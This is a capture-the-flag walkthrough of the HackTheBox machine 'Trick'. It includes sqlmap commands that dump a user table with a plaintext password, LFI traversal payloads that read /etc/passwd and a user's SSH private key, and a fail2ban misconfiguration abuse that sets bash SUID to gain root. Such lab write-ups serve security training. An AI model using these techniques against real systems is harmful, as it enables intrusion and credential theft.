CTF Trick

Benjamin

06-10-2021

CTF › HackTheBox

LFI, SQLI, Sudo

/etc/hosts

1	10.10.11.166 trick.htb

Rustscan

1	rustscan -a trick.htb

Output:

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack
25/tcp open  smtp    syn-ack
80/tcp open  http    syn-ack

wfuzz

So I’ve tried to list the directories and the subdomains, but there is nothing.
It’s not the real website, I have to dig deeper.

Dig

1	dig a trick.htb @trick.htb

Output:

;; communications error to 10.10.11.166#53: connection refused
;; communications error to 10.10.11.166#53: connection refused
;; communications error to 10.10.11.166#53: connection refused

; <<>> DiG 9.18.7 <<>> a trick.htb @trick.htb
;; global options: +cmd
;; no servers could be reached

the port 53 is closed, should I reset the machine ?

Lol, it was the solution.
https://stackoverflow.com/questions/131989/how-do-i-get-a-list-of-all-subdomains-of-a-domain

1	dig axfr trick.htb @trick.htb

preprod-payroll.trick.htb
I have to add it to /etc/hosts.

wfuzz

sqlmap

Replace curl by sqlmap and add -dbs to list the databases.

Now I’m gonna list the tables in the database.

sqlmap 'http://preprod-payroll.trick.htb/ajax.php?action=login' -X POST -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0' -H 'Accept: */*' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'X-Requested-With: XMLHttpRequest' -H 'Origin: http://preprod-payroll.trick.htb' -H 'Connection: keep-alive' -H 'Referer: http://preprod-payroll.trick.htb/login.php' -H 'Cookie: PHPSESSID=vle17ll7puj0b1kblu8c40ue3r' --data-raw 'username=fgh&password=fgh' -D payroll_db --tables

Now dump the user table:

sqlmap 'http://preprod-payroll.trick.htb/ajax.php?action=login' -X POST -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0' -H 'Accept: */*' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'X-Requested-With: XMLHttpRequest' -H 'Origin: http://preprod-payroll.trick.htb' -H 'Connection: keep-alive' -H 'Referer: http://preprod-payroll.trick.htb/login.php' -H 'Cookie: PHPSESSID=vle17ll7puj0b1kblu8c40ue3r' --data-raw 'username=fgh&password=fgh' -D payroll_db -T users --dump

Output:

Database: payroll_db
Table: users
[1 entry]
+----+-----------+---------------+------+---------+---------+-----------------------+------------+
| id | doctor_id | name          | type | address | contact | password              | username   |
+----+-----------+---------------+------+---------+---------+-----------------------+------------+
| 1  | 0         | Administrator | 1    | <blank> | <blank> | SuperGucciRainbowCake | Enemigosss |
+----+-----------+---------------+------+---------+---------+-----------------------+------------+

I can use theres creds to login.

Website 1

LFI

When I saw the index.php?page= I’ve tried to exploit it with wfuzz, but didn’t found anything.

1	wfuzz -c -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-LFISuite-pathtotest-huge.txt --sc 200 'http://preprod-payroll.trick.htb/index.php?page=../../../../../../../FUZZ'

If I can’t exploit it maybe there is some informations to gather.

Subdomain

wfuzz

1	wfuzz -c -f subdomains -w /usr/share/wordlists/wfuzz/others/subdomains.txt -u 'http://trick.htb' -H "Host: FUZZ.trick.htb" >> subdomains &

Found nothing.
The last subdomain was preprod-payroll, because it’s a preprod server.
So I should keep the word preprod and try again

1	wfuzz -c -f subdomains -w /usr/share/wordlists/wfuzz/others/subdomains.txt -u 'http://trick.htb' -H "Host: preprod-FUZZ.trick.htb" >> subdomains &

Now I know for what was made the last website, to find this subdomain.

Website 2

http://preprod-marketing.trick.htb

Ok, I have to add it to /etc/hosts.

And Voila.

It was made with this template: https://templatemo.com/tm-547-real-dynamic

We have few users:

Erik Morris
Michael Owen
Mary Kay
Jen Terry
Levi Moore

And again, the ?page=.

wfuzz

I wanted to try few wordlist.

1	wfuzz -c -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-Jhaddix.txt --sc 200 'http://preprod-marketing.trick.htb/index.php?page=../../../../../../../FUZZ' >> fli.txt &

http://preprod-marketing.trick.htb/index.php?page=....//....//....//....//....//....//....//....//....//etc/passwd

Yeah !
michael is a user.
Let’s get the flag.
http://preprod-marketing.trick.htb/index.php?page=....//....//....//....//....//....//....//....//....//home/michael/user.txt
Now let’s grab the private ssh key.
http://preprod-marketing.trick.htb/index.php?page=....//....//....//....//....//....//....//....//....//home/michael/.ssh/id_rsa

sudo exploit

sudo -l

Output:

Matching Defaults entries for michael on trick:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User michael may run the following commands on trick:
    (root) NOPASSWD: /etc/init.d/fail2ban restart

We have to play with fail2ban, there is nothing in gtfobin.

https://youssef-ichioui.medium.com/abusing-fail2ban-misconfiguration-to-escalate-privileges-on-linux-826ad0cdafb7
I have to play with the file iptables-multiport.conf, but I can’t write in it.
So I have to copy it somewhere and move it to replace the original one.

then add the line actionban = chmod u+s /bin/bash in the file iptables-multiport.conf.
Reboot the service with sudo /etc/init.d/fail2ban restart
Try to login 5 times via ssh without the private key and without a password.
Now you can use bash -p to become root.

/etc/hosts

Rustscan

wfuzz

Dig

wfuzz

directory

Login page

sqlmap

Website 1

LFI

Subdomain

wfuzz

Website 2

wfuzz

sudo exploit